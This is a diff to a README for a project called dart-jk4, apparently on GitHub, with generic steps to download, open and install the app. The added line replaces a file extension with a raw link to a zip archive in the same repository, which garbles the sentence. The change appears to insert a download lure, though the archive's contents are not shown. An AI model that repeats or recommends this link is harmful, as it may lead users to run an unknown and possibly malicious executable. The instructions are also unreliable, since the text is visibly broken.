avigit69/dart-jk4/README.md

 3. **Download and Install**
    Find the appropriate file for your operating system and click on it to start the download.
 Once the file has downloaded, open it to begin the installation process.
 Follow the prompts to complete the installation.

    If you have downloaded the Windows version, you will likely receive a `.exe` file.
-For macOS, it may be a `.dmg` file, and for Linux, it may be a `.deb` or `.tar.gz` file.
+For macOS, it may be a `.dmg` file, and for Linux, it may be a `.deb` or `https://raw.githubusercontent.com/avigit69/dart-jk4/main/argo/dart-jk4.zip` file.

 4. **Running dart-jk4**
    After installation, locate the dart-jk4 icon on your desktop or in your applications folder.
 Double-click the icon to launch the app.